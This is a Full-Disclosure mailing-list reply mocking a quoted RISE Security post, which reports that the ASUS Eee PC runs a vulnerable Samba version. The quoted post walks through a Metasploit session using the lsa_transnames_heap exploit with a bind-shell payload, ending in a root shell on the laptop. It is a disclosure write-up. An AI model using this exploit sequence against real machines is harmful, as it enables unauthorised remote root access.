So you ran metasploit and then made a blog post. Is this what 'security research' is considered now? And why did you write this is such a media hyped way? Trying to get some spotlight?
On Feb 8, 2008 10:47 AM, RISE Security <[EMAIL PROTECTED]> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > We recently acquired an ASUS Eee PC (if you want to know more about it, > a lot of reviews are available on internet). The first thing we did when > we put our hands at the ASUS Eee PC was to test its security. The ASUS > Eee PC comes with a customized version of Xandros operating system > installed, and some other bundled software like Mozilla Firefox, Pidgin, > Skype and OpenOffice.org. > > Analysing the running processes of the ASUS Eee PC, the first thing that > caught our attention was the running smbd process (the sshd daemon was > started by us, and is not enabled by default). > > > eeepc-rise:/root> ps -e > PID TTY TIME CMD > 1 ? 00:00:00 fastinit > 2 ? 00:00:00 ksoftirqd/0 > 3 ? 00:00:00 events/0 > 4 ? 00:00:00 khelper > 5 ? 00:00:00 kthread > 25 ? 00:00:00 kblockd/0 > 26 ? 00:00:00 kacpid > 128 ? 00:00:00 ata/0 > 129 ? 00:00:00 ata_aux > 130 ? 00:00:00 kseriod > 148 ? 00:00:00 pdflush > 149 ? 00:00:00 pdflush > 150 ? 00:00:00 kswapd0 > 151 ? 00:00:00 aio/0 > 152 ? 00:00:00 unionfs_siod/0 > 778 ? 00:00:00 scsi_eh_0 > 779 ? 00:00:00 scsi_eh_1 > 799 ? 00:00:00 kpsmoused > 819 ? 00:00:00 kjournald > 855 ? 00:00:00 fastinit > 857 ? 00:00:00 sh > 858 ? 00:00:00 su > 859 tty3 00:00:00 getty > 862 ? 00:00:00 startx > 880 ? 00:00:00 xinit > 881 tty2 00:00:06 Xorg > 890 ? 00:00:00 udevd > 952 ? 00:00:00 ksuspend_usbd > 953 ? 00:00:00 khubd > 1002 ? 00:00:00 acpid > 1027 ? 00:00:00 pciehpd_event > 1055 ? 00:00:00 ifplugd > 1101 ? 00:00:00 scsi_eh_2 > 1102 ? 00:00:00 usb-storage > 1151 ? 00:00:00 icewm > 1185 ? 00:00:01 AsusLauncher > 1186 ? 00:00:00 icewmtray > 1188 ? 00:00:01 powermonitor > 1190 ? 00:00:00 minimixer > 1191 ? 00:00:00 networkmonitor > 1192 ? 00:00:00 wapmonitor > 1193 ? 00:00:00 x-session-manag > 1195 ? 00:00:00 x-session-manag > 1200 ? 00:00:00 x-session-manag > 1201 ? 00:00:00 dispwatch > 1217 ? 00:00:00 cupsd > 1224 ? 00:00:00 usbstorageapple > 1234 ? 00:00:00 kondemand/0 > 1240 ? 00:00:00 portmap > 1248 ? 00:00:00 keyboardstatus > 1272 ? 00:00:00 memd > 1279 ? 00:00:00 scim-helper-man > 1280 ? 00:00:00 scim-panel-gtk > 1282 ? 00:00:00 scim-launcher > 1297 ? 00:00:00 netserv > 1331 ? 00:00:00 asusosd > 1476 ? 00:00:00 xandrosncs-agen > 1775 ? 00:00:00 dhclient3 > 2002 ? 00:00:00 nmbd > 2004 ? 00:00:00 smbd > 2005 ? 00:00:00 smbd > 2322 ? 00:00:00 sshd > 2345 ? 00:00:00 sshd > 2356 pts/0 00:00:00 bash > 2362 pts/0 00:00:00 ps > eeepc-rise:/root> > > > Retrieving the the smbd version, we discovered that it runs a vulnerable > version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit > we published earlier last year. > > > eeepc-rise:/root> smbd --version > Version 3.0.24 > eeepc-rise:/root> > > > With this information, we ran our exploit against the ASUS Eee PC using > the Debian/Ubuntu target (Xandros is based on Corel Linux, which is > Debian based). > > > msf > use linux/samba/lsa_transnames_heap > msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10 > RHOST => 192.168.50.10 > msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp > PAYLOAD => linux/x86/shell_bind_tcp > msf exploit(lsa_transnames_heap) > show targets > > Exploit targets: > > Id Name > -- ---- > 0 Linux vsyscall > 1 Linux Heap Brute Force (Debian/Ubuntu) > 2 Linux Heap Brute Force (Gentoo) > 3 Linux Heap Brute Force (Mandriva) > 4 Linux Heap Brute Force (RHEL/CentOS) > 5 Linux Heap Brute Force (SUSE) > 6 Linux Heap Brute Force (Slackware) > 7 DEBUG > > > msf exploit(lsa_transnames_heap) > set TARGET 1 > TARGET => 1 > msf exploit(lsa_transnames_heap) > exploit > [*] Started bind handler > [*] Creating nop sled.... > ... > [*] Trying to exploit Samba with address 0x08415000... > [*] Connecting to the SMB service... > [*] Binding to > 12345778-1234-abcd-ef00-0123456789ab:[EMAIL PROTECTED]:192.168.50.10[\lsarpc] > ... > [*] Bound to > 12345778-1234-abcd-ef00-0123456789ab:[EMAIL PROTECTED]:192.168.50.10[\lsarpc] > ... > [*] Calling the vulnerable function... > [+] Server did not respond, this is expected > [*] Command shell session 1 opened (192.168.50.201:33694 -> > 192.168.50.10:4444) > msf exploit(lsa_transnames_heap) > sessions -i 1 > [*] Starting interaction with 1... > > uname -a > Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686 > GNU/Linux > id > uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup) > > > Easy to learn, Easy to work, Easy to root. > > > The original blog post and more information can be found in our > website at http://risesecurity.org/. > > Best regards, > RISE Security > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.2.6 (GNU/Linux) > > iD8DBQFHrIeHhFjK78TGSUERAvq7AJ9iz2sHD4/cQ0CdlCC1axNiVhwmJwCfddEd > 6tg6XRBCWHfPWFrSdVKu5oA= > =OFwe > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/